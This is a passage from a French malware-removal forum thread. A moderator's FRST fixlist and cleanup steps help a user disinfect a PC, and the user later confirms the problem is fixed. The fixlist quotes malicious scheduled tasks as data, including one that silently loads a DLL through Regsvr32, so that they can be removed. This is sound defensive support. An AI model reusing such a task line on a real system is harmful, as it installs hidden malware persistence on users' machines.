Task: {30AD1A03-3B71-479A-9F59-FA393CBF30E1} - \HDWallPaper -> Pas de fichier <==== ATTENTION
Task: {38D45676-FB6E-4249-B4C2-319D1BC581DC} - System32\Tasks\{28E36703-B618-4C61-86F2-B8461441D619} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.85.109/fr/abandoninstall?page=tsProgressBar
Task: {4BBE0001-DD1F-4059-A973-F7A248400495} - \ttwifi -> Pas de fichier <==== ATTENTION
Task: {4F78AF17-7EEF-4D1A-A866-B6C4BDB9FC8E} - System32\Tasks\{DDECCD21-4679-971B-9027-447A8990FE6A} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\55f6ff37\7880bc79.dll" <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2°)
Réinstalle proprement Google Chrome, en suivant exactement cette procédure : Réparer et réinstaller proprement Google Chrome

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Fais un scan en ligne avec NOD32 puis enregistre le rapport. Envoie le sur http://pjjoint.malekal.com/ et donne le lien ici.

0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1
1 juin 2017 à 20:57
J'ai un petit soucis avec le tutoriel pour réinstaller google chrome à l'étape "vérifier le profil de google chrome" j'ai le dossier google, mais j'ai pas chrome, j'ai chrome cleanup tool, et j'ai pas de dossier User data. Je comprend pas si je dois supprimer le dossier google ou si je peut directement passer à l'installation.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628 > MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019
1 juin 2017 à 20:59
ok continue dans ce cas.
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1 > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
1 juin 2017 à 22:34
Je t'enverrai le rapport demain si tu le souhaite encore, ca fais 40min qu'il est en marche et je suis même pas à 50%
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628 > MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019
2 juin 2017 à 18:03
ok :)
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1 > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
2 juin 2017 à 20:11
Du coup le scan s'est finis et puis j'ai pas trouvé comment faire le rapport, j'avais que 2 choix à cocher avant de fermer et il n'y avait pas pour le rapport.
En tout cas maintenant tout fonctionne bien, merci encore pour ton aide, et en plus de sa, tu as été claire dans tes informations et les tutos étaient bien détailler, donc merci encore.

A bientôt ;)
0